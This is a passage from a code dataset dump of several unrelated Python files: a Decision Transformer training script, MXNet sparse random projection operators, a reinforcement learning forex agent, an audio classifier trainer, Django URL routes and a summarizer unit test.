num_trajectories += 1\n ind -= 1 # 按照Return从高到低\n\n # 输出是除了最小的Return之外的索引列表\n sorted_inds = sorted_inds[-num_trajectories:]\n\n # Reweight Sampling\n # 根据timesteps的长度的相对比重来进行sample\n p_sample = traj_lens[sorted_inds] / sum(traj_lens[sorted_inds])\n\n def get_batch(batch_size=256, max_len=K):\n batch_inds = np.random.choice(\n np.arange(num_trajectories),\n size = batch_size,\n replace = True,\n p = p_sample, #依据timesteps采样\n )\n\n s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []\n for i in range(batch_size):\n traj = trajectories[int(sorted_inds[batch_inds[i]])]\n\n si = random.randint(0,traj['rewards'].shape[0] - 1) # 采样位置\n\n # debug\n # print(\"Start sampling position: \", si)\n\n # get sequences from dataset\n # s\n # print(traj['observations'][si:si + max_len].reshape(1, -1, state_dim).shape) # shape: 1, 20, 11\n s.append(traj['observations'][si:si + max_len].reshape(1, -1, state_dim)) # 1, XXX ,state_dim\n\n # a\n # print(traj['actions'][si:si + max_len].reshape(1, -1, action_dim).shape) # 1, 20, 3\n a.append(traj['actions'][si:si + max_len].reshape(1, -1, action_dim))\n\n # r\n r.append(traj['rewards'][si:si + max_len].reshape(1, -1, 1)) # append(Dims: 1,20, 1)\n if 'terminals' in traj:\n d.append(traj['terminals'][si:si + max_len].reshape(1, -1))\n else:\n d.append(traj['dones'][si:si + max_len].reshape(1, -1))\n\n # timesteps\n timesteps.append(np.arange(si, si + s[-1].shape[1]).reshape(1, -1)) # Append Dim: (1,20,1)\n # 检查是否有tps数量大于max_ep_len的情况 (max_ep_len=1000) 若有,按照max_ep_len-1来padding\n timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len-1 # padding cutoff\n # Return-to-go\n ret = discount_cumsum(traj['rewards'][si:],gamma=1.)\n # ret = ret[:s[-1].shape[1]+1].reshape(1,-1,1)\n ret = ret[:s[-1].shape[1]].reshape(1, -1, 1)\n rtg.append(ret) # Append(1,21,1) 是21>max_len\n\n if rtg[-1].shape[1] <= s[-1].shape[1]: # 21 & 20\n rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)\n\n # padding and state + reward normalization\n tlen = s[-1].shape[1]\n # print(\"timestep len: \", tlen) # 20\n s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)\n s[-1] = (s[-1] - state_mean) / state_std\n a[-1] = np.concatenate([np.ones((1, max_len - tlen, action_dim)) * -10., a[-1]], axis=1)\n r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)\n d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)\n rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale\n # print(\"Return-to-go:\",rtg[-1].shape)\n\n timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)\n\n mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))\n\n s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)\n a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)\n r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)\n d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)\n rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)\n timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)\n mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)\n\n # debug\n # print(\"=\"*40)\n # print(\"Dim s:\", s.shape) # BS,20(max_len),1\n # print(\"Dim a:\", a.shape)\n # print(\"Dim r:\", r.shape)\n # print(\"Dim d:\", d.shape)\n # print(\"Dim rtg:\", rtg.shape) # BS,21(max_len+1),1\n # print(\"Dim timesteps:\", timesteps.shape)\n # print(\"Dim mask:\", mask.shape)\n # print(\"=\" * 40)\n\n return s,a,r,d,rtg,timesteps,mask\n\n def eval_episodes(target_rew,log_tb=args.log_to_tb):\n def fn(model,log_tb=log_tb):\n returns, lengths = [], []\n for _ in range(num_eval_episodes):\n with torch.no_grad():\n if args.model_type == 'DT':\n ret, length = evaluate_episode_rtg(\n env,\n state_dim,\n action_dim,\n model,\n max_ep_len=max_ep_len,\n scale=scale,\n target_return=target_rew/scale,\n mode=mode,\n state_mean=state_mean,\n state_std=state_std,\n device=device,\n )\n else:\n ret, length = evaluate_episode(\n env,\n state_dim,\n action_dim,\n model,\n max_ep_len=max_ep_len,\n target_return=target_rew/scale,\n mode=mode,\n state_mean=state_mean,\n state_std=state_std,\n device=device,\n )\n returns.append(ret)\n lengths.append(length)\n\n mean_returns = np.mean(returns)\n mean_tplen = np.mean(lengths)\n\n if log_tb:\n return {\n f'target_{target_rew}_return_mean': np.mean(returns),\n f'target_{target_rew}_return_std': np.std(returns),\n f'target_{target_rew}_length_mean': np.mean(lengths),\n f'target_{target_rew}_length_std': np.std(lengths),\n }, mean_tplen, mean_returns\n else:\n return {\n f'target_{target_rew}_return_mean': np.mean(returns),\n f'target_{target_rew}_return_std': np.std(returns),\n f'target_{target_rew}_length_mean': np.mean(lengths),\n f'target_{target_rew}_length_std': np.std(lengths),\n }\n\n return fn\n\n if args.model_type == 'DT':\n model = DecisionTransformer(\n state_dim=state_dim,\n act_dim=action_dim,\n max_length=K,\n max_ep_len=max_ep_len,\n hidden_size=args.embed_dim,\n n_layer=args.n_layer,\n n_head=args.n_head,\n n_inner=4*args.embed_dim,\n activation_function=args.activation_function,\n n_positions=1024,\n resid_pdrop=args.dropout,\n attn_pdrop=args.dropout,\n )\n elif args.model_type == 'BC':\n model = MLPBCModel(\n state_dim=state_dim,\n act_dim=action_dim,\n max_length=K,\n hidden_size=args.embed_dim,\n n_layer=args.n_layer,\n )\n else:\n raise NotImplementedError\n\n # To Cuda\n model = model.to(device)\n\n # Warmup stage\n warmup_steps = args.warmup_steps\n\n # Optim\n optimizer = torch.optim.Adam(\n model.parameters(),\n lr=args.lr,\n weight_decay=args.wd,\n )\n\n # Scheduler学习率优化\n scheduler = torch.optim.lr_scheduler.LambdaLR(\n optimizer,\n lambda steps: min((steps+1)/warmup_steps, 1)\n )\n\n # Trainer 选择\n if args.model_type == 'DT':\n trainer = SequenceTrainer(\n model = model,\n optimizer = optimizer,\n batch_size = batch_size,\n get_batch = get_batch,\n scheduler = scheduler,\n loss_fn = lambda s_hat, a_hat, r_hat, s, a, r: torch.mean((a_hat - a)**2),\n # eval_target第一个期望return-to-go\n eval_fns=[eval_episodes(tar) for tar in env_targets],\n )\n\n elif args.model_type == 'BC':\n trainer = ActTrainer(\n model=model,\n optimizer=optimizer,\n batch_size=batch_size,\n get_batch=get_batch,\n scheduler=scheduler,\n loss_fn=lambda s_hat, a_hat, r_hat, s, a, r: torch.mean((a_hat - a)**2),\n eval_fns=[eval_episodes(tar) for tar in env_targets],\n )\n\n for iter in range(args.max_iters):\n if args.log_to_tb:\n output,mean_ret,mean_len = trainer.train_iteration(\n num_steps = args.num_steps_per_iter,\n iter_num = iter+1,\n print_logs = True,\n TB_log = args.log_to_tb\n )\n # tb writer\n writer.add_scalar(tag='DT/mean_return',global_step=iter,scalar_value=mean_ret)\n writer.add_scalar(tag='DT/mean_len', global_step=iter, scalar_value=mean_len)\n writer.add_scalar(tag='DT/mean_mse_a',global_step=iter, scalar_value=output['training/train_loss_mean'])\n writer.add_scalar(tag='DT/std_mse_a', global_step=iter, scalar_value=output['training/train_loss_std'])\n # print(\"成功写入!\")\n\n model_save(args.record_algo+args.test_cycles,model)\n\n\n else:\n output = trainer.train_iteration(\n num_steps = args.num_steps_per_iter,\n iter_num = iter+1,\n print_logs = True,\n TB_log = args.log_to_tb\n )\n\n\n\nif __name__ == \"__main__\":\n DTargs = Config()\n main_dt(args=DTargs)\n\n # rewards = np.array([1,2,3,4,5])\n # print(rewards.sum())\n #\n # # 读取数据可视化\n # dataset_path = 'hopper-medium-v2.pkl'\n # with open(dataset_path, 'rb') as f:\n # trajectories = pickle.load(f)\n # print(\"数据读取完毕... ...\")\n #\n # returns = []\n # for path in trajectories:\n # print(path['observations'].shape)\n # print(path['rewards'].shape)\n # returns.append(path['rewards'].sum())\n #\n # print(np.array(returns).shape)\n\n # Reward排序\n # returns = np.array([12,333,445,6,789,991,23,76])\n # traj_lens = np.array([7,8,9,20,15,12,16,17])\n # sorted_inds = np.argsort(returns)\n # print(sorted_inds) # [3 0 6 7 1 2 4 5] #对应回报最大的索引排序...\n # num_traj = 1\n # # 最大Return对应的tp数\n # timesteps = traj_lens[sorted_inds[-1]] # 12 991\n # print(timesteps) # 12个tps获得991的累计return\n #\n # num_trajectories = 1\n #\n # len_trajs = len(returns)\n #\n # ind = len_trajs - 2\n #\n # num_timesteps = traj_lens.sum()\n #\n # while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] < num_timesteps:\n # timesteps += traj_lens[sorted_inds[ind]]\n # num_trajectories += 1\n # ind -= 1\n #\n # # 输出是除了最小的Return之外的索引列表\n # sorted_inds = sorted_inds[-num_trajectories:]\n # print(sorted_inds)\n\n\n\n","repo_name":"HzcIrving/DLRL-PlayGround","sub_path":"Offline RL/DT/DT_main.py","file_name":"DT_main.py","file_ext":"py","file_size_in_byte":16153,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"720910215","text":"import os\nimport numpy as np\nimport mxnet as mx\n\n\n# ref: http://mxnet.io/how_to/new_op.html\n\nclass RandomBagOfWordsProjection(mx.operator.CustomOp):\n \"\"\"Random projection layer for sparse bag-of-words (n-hot) inputs.\n In the sparse input, only the indices are supplied, because all the\n values are understood to be exactly 1.0.\n\n See also RandomProjection for values other than 1.0.\n \"\"\"\n\n def __init__(self, vocab_size, output_dim, random_seed=54321):\n # need_top_grad=True means this is not a loss layer\n super(RandomBagOfWordsProjection, self).__init__()\n self._vocab = vocab_size\n self._proj_dim = output_dim\n #NOTE: This naive implementation is slow and uses lots of memory.\n # Should use something smarter to not instantiate this matrix.\n rs = np.random.RandomState(seed=random_seed)\n self.W = self.random_unit_vecs(self._vocab, self._proj_dim, rs)\n\n def random_unit_vecs(self, num_vecs, num_dims, rs):\n W = rs.normal(size=(num_vecs, num_dims))\n Wlen = np.linalg.norm(W, axis=1)\n W_unit = W / Wlen[:,None]\n return W_unit\n\n def _get_mask(self, idx, in_data):\n \"\"\"Returns the mask by which to multiply the parts of the embedding layer.\n In this version, we have no weights to apply.\n \"\"\"\n mask = idx >= 0 # bool False for -1 values that should be removed. shape=(b,mnz)\n mask = np.expand_dims(mask,2) # shape = (b,mnz,1)\n mask = np.repeat(mask, self._proj_dim, axis=2) # shape = (b,mnz,d)\n return mask\n\n def forward(self, is_train, req, in_data, out_data, aux):\n #Note: see this run in notebooks/howto-numpy-random-proj.ipynb\n # Notation for shapes: b = batch_size, mnz = max_nonzero, d = proj_dim\n idx = in_data[0].asnumpy().astype('int32') # shape=(b,mnz)\n\n wd = self.W[idx] # shape= (b,mnz,d)\n mask = self._get_mask(idx, in_data)\n wd = np.multiply(wd,mask) # shape=(b,mnz,d), but zero'd out non-masked\n y = np.sum(wd,axis=1) # shape=(b,d)\n mxy = mx.nd.array(y) #NOTE: this hangs if the environment variables aren't set correctly\n # See https://github.com/dmlc/mxnet/issues/3813\n self.assign(out_data[0], req[0], mxy)\n\n\n@mx.operator.register(\"SparseBOWProj\")\nclass RandomBagOfWordsProjectionProp(mx.operator.CustomOpProp):\n def __init__(self, vocab_size, output_dim):\n # need_top_grad=True means this is not a loss layer\n super(RandomBagOfWordsProjectionProp, self).__init__(need_top_grad=True)\n self._kwargs = {\n 'vocab_size': int(vocab_size),\n 'output_dim': int(output_dim),\n }\n\n def list_arguments(self):\n return ['indexes']\n\n def list_outputs(self):\n return ['output']\n\n def create_operator(self, ctx, shapes, dtypes, **kwargs):\n return RandomBagOfWordsProjection(**self._kwargs)\n\n def infer_shape(self, in_shape):\n batch_size = in_shape[0][0]\n output_shape = (batch_size, self._kwargs['output_dim'])\n return in_shape, [output_shape], []\n\n\nclass SparseRandomProjection(RandomBagOfWordsProjection):\n \"\"\"Random projection of sparse input vector.\n Takes an sparse input layer, effectively in coordinate (COO) format,\n where the row number is implicit, because it's the minibatch record.\n\n See the simpler version RandomBagOfWordsProjection if all values are 1.0.\n \"\"\"\n\n def _get_mask(self, idx, in_data):\n \"\"\"Returns the mask by which to multiply the parts of the embedding layer.\n In this version, we apply the weights.\n \"\"\"\n val = in_data[1].asnumpy() # shape=(b,mnz)\n mask = idx >= 0 # bool False for -1 values that should be removed. shape=(b,mnz)\n mask = np.multiply(mask,val) # All (b,mnz)\n mask = np.expand_dims(mask,2) # shape = (b,mnz,1)\n mask = np.repeat(mask, self._proj_dim, axis=2) # shape = (b,mnz,d)\n return mask\n\n\n@mx.operator.register(\"SparseRandomProjection\")\nclass SparseRandomProjectionProp(RandomBagOfWordsProjectionProp):\n\n def list_arguments(self):\n return ['indexes', 'values']\n\n def create_operator(self, ctx, shapes, dtypes, **kwargs):\n return SparseRandomProjection(**self._kwargs)\n\n def infer_shape(self, in_shape):\n # check that indexes and values are the same shape.\n if in_shape[0] != in_shape[1]:\n raise ValueError(\"Input shapes differ. indexes:%s. values:%s. must be same\"\n % (str(in_shape[0]),str(in_shape[1])))\n return super(SparseRandomProjectionProp,self).infer_shape(in_shape)\n\n\nif __name__ == \"__main__\":\n print(\"Simple test of proj layer\")\n data = mx.symbol.Variable('data')\n vals = mx.symbol.Variable('vals')\n net = mx.symbol.Custom(indexes=data, values=vals, name='rproj',\n op_type='SparseRandomProjection',\n vocab_size=999, output_dim=29)\n d = mx.nd.zeros(shape=(3,100))\n v = mx.nd.ones(shape=(3,100))\n e = net.bind(ctx=mx.cpu(), args={'data':d, 'vals':v})\n e.forward()\n print(e.outputs[0].asnumpy())\n print(\"Done with proj layer test\")\n\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/recommenders/randomproj.py","file_name":"randomproj.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"23112203745","text":"import os\nimport socket\nimport time\nimport csv\nimport random\nimport numpy as np\nfrom collections import deque\n\nfrom pedlar.agent import Agent\nfrom rl_ml import DeepQNN\n\nHOST = '127.0.0.1'\nPORT = 65430\n\nclass RLAgent(Agent):\n name = \"RL_Agent\"\n def __init__(self,\n file_length=None,\n verbose=False, ## prints key info\n visualise=False, ## visualising with bokeh\n verbose_ticks=False, ## prints ticks\n debug=False, ## prints network actions at each step\n write=False, ## exports results to an output csv\n train=True, ## trains model, false uses current weights\n load_model=False,## loads pretrained model\n **kwargs):\n \"\"\" Initialises the agent \"\"\"\n \n self.constants = {'name': RLAgent.name,\n 'diff_step': 20,\n 'action_size': 4, ## buy, sell, cancel, do nothing\n 'mid': 100, 'mid_ma': 2000,\n 'memory': 1000, 'order_memory': 1000, \n 'verbose': verbose, 'visualise': visualise,\n 'verbose_ticks': verbose_ticks, 'debug': debug,\n 'write': write, 'train': train, 'load_model': load_model,\n 'backtest_file_length': file_length}\n \n if self.constants['write']:\n open('data/orders.csv', 'w').close()\n \n if self.constants['visualise']:\n msg = '0.0,0.0,0.0,0.0,0.0'\n self.send_to_socket(msg)\n \n ## Buffers\n self.mid_buffer = deque(maxlen=self.constants['mid'])\n self.mid_ma_buffer = deque(maxlen=self.constants['mid_ma'])\n self.ma_diff_buffer = self._get_max_ma()\n \n ## Variables\n \"\"\" Values change during training \"\"\"\n self.tick_number = 0\n self.hold = 100\n self.balance = 0\n self.order_num = 0\n self.last_order = -1\n self.order_dir = None\n self.order_length = 0\n self.mid = None\n self.bid_diff, self.ask_diff = None, None\n self.spread, self.diff = None, None\n self.last_bid, self.last_ask = None, None\n self.max_drawdown, self.max_upside = None, None\n \n self.constants['inst_state_size'] = len(self.get_inst_inputs())\n self.constants['ma_diff_buffer_size'] = self.ma_diff_buffer.shape[0]\n \n ## Load parent classes\n Agent.__init__(self, **kwargs)\n \n self.DQ = DeepQNN(self.constants)\n \n \n \n def on_tick(self, bid, ask):\n \"\"\" \n On tick handler\n Returns: None\n \"\"\"\n self.update_backtest_status()\n self.update_bid_ask_mid_spread(bid, ask)\n \n self.order_dir, self.diff = 0, 0 ## Order_dir and order diff reset (If in order then updated)\n if self.last_bid is None:\n self.last_bid, self.last_ask = self.bid, self.ask\n return\n self.bid_diff, self.ask_diff = self.bid-self.last_bid, self.ask-self.last_ask ## Gets bid,ask change since last tick\n self.last_bid, self.last_ask = self.bid, self.ask\n \n self.mid_buffer.append(self.mid) \n mid_ma = np.mean(np.array(self.mid_buffer))\n self.mid_ma_buffer.append(mid_ma)\n self.update_ma_diff_buffer() ## Updates the moving average difference buffer\n \n if self.hold > 0: \n self.hold -= 1\n if self.constants['verbose'] or self.constants['verbose_ticks']:\n print(\"Holding:\", self.hold)\n return\n \n if self.orders: \n ## If in order executed\n self.order_length += 1\n \n if self.constants['visualise']:\n if self.order_length % 5 == 0:\n msg = 'NA,NA,NA,{:.3f},0.0'.format(self.order_length)\n self.send_to_socket(msg)\n \n self.update_diff_and_order_dir()\n self.update_drawdown_upside()\n \n self.print_tick_status()\n \n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.memory = self.DQ.main_loop(self.DQ.memory, inst, lstm, self.orders)\n self.act(self.DQ.variables['action'])\n return\n \n \n \n def on_bar(self, bopen, bhigh, blow, bclose):\n \"\"\" On bar handler \"\"\"\n self.update_backtest_status()\n if self.constants['verbose_ticks']:\n print(\"BAR: \", bopen, bhigh, blow, bclose)\n return\n \n \n \n def on_order(self, order):\n \"\"\" On order handler \"\"\"\n self.last_order = order.id\n self.order_num += 1\n self.order_length = 0\n\n self.order_dir = 1 if order.type == \"buy\" else -1\n self.max_drawdown, self.max_upside = self.spread * -1, self.spread * -1\n if self.constants['verbose']:\n print(f\"ORDER:\\t{self.spread * 1000: .3f}\\t{order.type}\\t{self.DQ.variables['rnd_choice']: }\")\n \n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.order_memory = self.DQ.main_loop(self.DQ.order_memory, \n inst, lstm, self.orders, \n new_action=False) \n return\n\n \n \n def on_order_close(self, order, profit):\n \"\"\" On order close handler \"\"\"\n self.balance += profit\n text = '{:.3f},{:.3f},{:.3f},{:.3f},{:.3f}'.format(self.order_num,\n profit, \n self.balance, \n self.order_length,\n self.DQ.variables['rnd_choice'])\n inst = self.get_inst_inputs()\n lstm = self.ma_diff_buffer\n self.DQ.order_memory = self.DQ.main_loop(self.DQ.order_memory, \n inst, lstm, self.orders,\n reward=profit, done=True,\n new_action=False) \n self.order_length = 0\n \n if self.constants['verbose']:\n print(f'EXIT: {text},{self.DQ.order_epsilon: .5f},{self.DQ.empty_epsilon: .5f}')\n \n if self.constants['write']: ## Appends to csv \n with open('performance/orders.csv', 'a') as f:\n f.write(f'{text}\\n')\n \n if self.constants['visualise']: ## Visualises in bokeh \n self.send_to_socket(text)\n \n if self.constants['train']:\n self.DQ.replay(self.DQ.memory, self.DQ.batch_size * 4, \n self.DQ.model, decay=False)\n self.DQ.replay(self.DQ.order_memory, self.DQ.batch_size, \n self.DQ.model)\n \n if self.order_num % 4 == 0:\n \"\"\" Saves weights \"\"\"\n self.DQ.save(f'models/{RLAgent.name}_weights.h5',\n self.DQ.model)\n return\n \n \n \n def update_bid_ask_mid_spread(self, bid, ask):\n self.bid, self.ask = bid, ask \n self.mid = (ask + bid)/2\n self.spread = ask - bid\n return\n \n \n def update_ma_diff_buffer(self):\n mids = np.array(self.mid_ma_buffer) ## Converts deque to np.array\n mids = mids[::-self.constants['diff_step']] ## Gets data point every diff_step\n mids = np.reshape(mids, mids.shape[0]) \n diff_arr = np.diff(mids) ## Calculates difference between points\n if diff_arr.shape[0] == 0: \n ## Catches beginning if self.hold is too small so no data is in diff_arr\n return\n ## Replaces the end values of the array to be fed into the RNN\n self.ma_diff_buffer[-len(diff_arr):] = diff_arr[:] \n return\n \n \n def update_diff_and_order_dir(self):\n \"\"\" \n Updates current diff and order_dir (order dir) \n \"\"\"\n o = self.orders[self.last_order] #Gets current order \n if o.type ==\"buy\":\n self.diff = self.bid - o.price\n self.order_dir = 1\n else:\n self.diff = o.price - self.ask\n self.order_dir = -1\n return\n \n \n def update_drawdown_upside(self):\n if self.diff < self.max_drawdown:\n self.max_drawdown = self.diff\n if self.diff > self.max_upside:\n self.max_upside = self.diff\n return\n \n \n def get_inst_inputs(self):\n inst_inputs = [[self.bid_diff], [self.ask_diff], \n [self.spread], [self.order_dir], [self.diff],\n [self.max_drawdown], [self.max_upside]]\n return inst_inputs\n \n\n def act(self, action):\n \"\"\" \n Performs action:\n - 1 : buys \n - 2 : sells \n - 3 : closes\n - 0 : nothing\n \"\"\"\n if action == 1:\n self.buy()\n elif action == 2:\n self.sell()\n elif action == 3:\n if self.orders:\n self.close()\n else:\n pass\n return\n \n \n def _get_max_ma(self):\n \"\"\" Returns full moving average buffer - used in setup \"\"\"\n return np.zeros(self.constants['mid_ma'])[::-self.constants['diff_step']]\n \n def update_backtest_status(self):\n self.tick_number += 1\n if self.constants['backtest_file_length'] is not None:\n if self.tick_number % 100 == 0:\n print('Backtest status: {:.3f} %'.format(100 * self.tick_number \n / self.constants['backtest_file_length']))\n \n def print_tick_status(self):\n \"\"\" Displays the tick status after every tick \"\"\"\n if self.orders:\n if self.constants['verbose'] and self.constants['verbose_ticks']:\n print(\"{: .5f} |\\t{: .5f}\\t{: .5f} |\\t{: .5f}\\t{: .5f}\"\n .format(self.diff, \n self.bid_diff, self.ask_diff, \n self.max_drawdown, self.max_upside))\n else:\n if self.constants['verbose'] and self.constants['verbose_ticks']:\n print(\"{: .5f}\\t{: .5f}\"\n .format(self.bid_diff, self.ask_diff))\n return\n \n \n def send_to_socket(self, msg):\n \"\"\" \n Sends message to bokeh server \n \n reward time step - long\n reward - float\n \n order time step - long\n inst val - float\n cum val - double\n max drawdown - float\n max upside - float\n \n order length count - int \n wait length count - int\n \n rnd order exit - bool (1 = yes, 0 = no) \n rnd order entry - bool (1 = yes, 0 = no)\n \n backtest percent - float\n \"\"\"\n \n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(msg.encode())\n return\n \n \n \n \nif __name__ == \"__main__\": \n backtest = True\n if backtest:\n filename=\"data/1yr_backtest_GBPUSD.csv\"\n with open(filename, newline='', encoding='utf-16') as csvfile:\n reader = csv.reader(csvfile)\n length = sum(1 for row in reader)\n agent = RLAgent(file_length=length, backtest=filename)\n else:\n agent = RLAgent(username=\"algosoc\",\n password=\"1234\",\n ticker=\"tcp://icats.doc.ic.ac.uk:7000\",\n endpoint=\"http://icats.doc.ic.ac.uk\")\n agent.run()\n","repo_name":"linyang17/ASA","sub_path":"src/agent_rl.py","file_name":"agent_rl.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"32868416863","text":"\nimport datetime\nimport os\nimport time\n\nimport pandas as pd\nimport torch\nfrom torch.utils.data import random_split\nfrom torch import nn\n\nfrom utils import *\nfrom model import *\n\n\ndef train(parser_args):\n\n print(\"loading data...\")\n df = pd.read_csv(parser_args.csv_path)\n\n myds = SoundDS(df, parser_args.data_path)\n\n num_items = len(myds)\n num_train = round(num_items * 0.8)\n num_val = num_items - num_train\n train_ds, val_ds = random_split(myds, [num_train, num_val])\n print(f\"total : {num_items}, train : {num_train}, val : {num_val}\")\n\n train_dl = torch.utils.data.DataLoader(train_ds, batch_size=parser_args.batch_size, shuffle=True)\n val_dl = torch.utils.data.DataLoader(val_ds, batch_size=parser_args.batch_size, shuffle=False)\n\n print(\"data loading done!\")\n\n myModel = AudioClassifier_test()\n device = torch.device(f\"cuda:{parser_args.gpu}\" if torch.cuda.is_available() else \"cpu\")\n print(\"training with decive :\", device)\n # device = torch.device(\"cpu\")\n myModel = myModel.to(device)\n next(myModel.parameters()).device\n\n training(myModel, train_dl, val_dl, parser_args.epochs, device)\n\n todays_date = datetime.now()\n\n torch.save(myModel, os.path.join(parser_args.model_dir, f'{todays_date.year}{todays_date.month:02}{todays_date.day:02}_{todays_date.hour:02}_{todays_date.minute:02}.pt'))\n # torch.save(myModel.state_dict(), \"./20210525_model_noBN_normalize_each_file.pth\")\n\n\ndef training(model, train_dl, val_dl, num_epochs, device):\n print('Start training ...')\n\n cur_time = time.time()\n\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n max_lr=0.001,\n steps_per_epoch=int(len(train_dl)),\n epochs=num_epochs,\n anneal_strategy=\"linear\",\n )\n\n for epoch in range(num_epochs):\n running_loss = 0.0\n correct_prediction = 0\n total_prediction = 0\n\n for i, data in enumerate(train_dl):\n inputs, labels = data[0].to(device), data[1].to(device)\n\n # inputs_m, inputs_s = inputs.mean(), inputs.std()\n # inputs = (inputs - inputs_m) / inputs_s\n\n optimizer.zero_grad()\n\n outputs = model(inputs)\n # loss = criterion(outputs, torch.max(labels, 1)[1])\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n running_loss += loss.item()\n\n _, prediction = torch.max(outputs, 1)\n # correct_prediction += (prediction == torch.max(labels)).sum().item()\n correct_prediction += (prediction == labels).sum().item()\n\n # print(f\"prediction = {prediction}\")\n # print(f\"labels = {labels}\")\n\n total_prediction += prediction.shape[0]\n\n print(\n f\"Epoch : {epoch + 1}/{num_epochs}, step : {i + 1} / {int(len(train_dl))}, loss: {running_loss / (i+1) : .5f} \\r\",\n end=\"\",\n )\n\n num_batches = len(train_dl)\n avg_loss = running_loss / num_batches\n acc = correct_prediction / total_prediction\n\n print(\n f\"\\nEpoch: {epoch+1}/{num_epochs}, Loss: {avg_loss:.2f}, Accuracy: {acc:.2f} \",\n end=\"\",\n )\n\n inference(model, val_dl, device)\n\n print(f\"Finished Training, Total training time = {time.time() - cur_time}\")\n","repo_name":"shpark3312/sound_classification","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28421004493","text":"from django.conf.urls import url\nfrom django.shortcuts import render\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n url(r'^$',views.admin_home),\n url(r'^add_movie/$',views.addmovie),\n url(r'^showmovies/$',views.showmovies),\n url(r'^showmovie/$',views.showmovie),\n url(r'^updatemovie/$',views.updatemovie),\n url(r'^deletemovie/$',views.deletemovie),\n url(r'^alogout/$',views.alogout),\n path('addmovie.html',lambda request: render(request,'addmovie.html')),\n path('asettings.html',lambda request: render(request,'asettings.html')),\n path('ashowmovie.html',lambda request: render(request,'ashowmovie.html'))\n]","repo_name":"jp701/Automated-Movie-Rating-System","sub_path":"MR_SYSTEM/adminapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12857234602","text":"import unittest\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom headliner.losses import masked_crossentropy\nfrom headliner.model.basic_summarizer import BasicSummarizer\nfrom headliner.model.attention_summarizer import AttentionSummarizer\nfrom headliner.model.transformer_summarizer import TransformerSummarizer\nfrom headliner.preprocessing.dataset_generator import DatasetGenerator\nfrom headliner.preprocessing.keras_tokenizer import KerasTokenizer\nfrom headliner.preprocessing.preprocessor import Preprocessor\nfrom headliner.preprocessing.vectorizer import Vectorizer\n\n\nclass TestTraining(unittest.TestCase):\n\n def setUp(self) -> None:\n tf.random.set_seed(42)\n np.random.seed(42)\n self.data = [('a b', 'c'), ('a b c', 'd')]\n tokenizer_encoder = KerasTokenizer(lower=False, filters='')\n tokenizer_decoder = KerasTokenizer(lower=False, filters='')\n tokenizer_encoder.fit(['a b c '])\n tokenizer_decoder.fit(['c d '])\n self.vectorizer = Vectorizer(tokenizer_encoder=tokenizer_encoder,\n tokenizer_decoder=tokenizer_decoder,\n max_output_len=3)\n self.preprocessor = Preprocessor()\n batch_generator = DatasetGenerator(2)\n data_prep = [self.preprocessor(d) for d in self.data]\n data_vecs = [self.vectorizer(d) for d in data_prep]\n self.dataset = batch_generator(lambda: data_vecs)\n self.loss_func = masked_crossentropy\n\n def test_training_summarizer_attention(self) -> None:\n attention_summarizer = AttentionSummarizer(lstm_size=10,\n embedding_size=10)\n attention_summarizer.init_model(preprocessor=self.preprocessor,\n vectorizer=self.vectorizer,\n embedding_weights_encoder=None,\n embedding_weights_decoder=None)\n loss_attention = 0\n train_step = attention_summarizer.new_train_step(loss_function=self.loss_func,\n batch_size=2)\n for _ in range(10):\n for source_seq, target_seq in self.dataset.take(-1):\n loss_attention = train_step(source_seq, target_seq)\n print(str(loss_attention))\n\n self.assertAlmostEqual(1.577033519744873, float(loss_attention), 5)\n output_attention = attention_summarizer.predict_vectors('a c', '')\n expected_first_logits = np.array([-0.077805, 0.012667, 0.021359, -0.04872, 0.014989])\n np.testing.assert_allclose(expected_first_logits, output_attention['logits'][0], atol=1e-6)\n self.assertEqual(' a c ', output_attention['preprocessed_text'][0])\n self.assertEqual('d ', output_attention['predicted_text'])\n\n def test_training_summarizer_basic(self) -> None:\n basic_summarizer = BasicSummarizer(lstm_size=10,\n embedding_size=10)\n 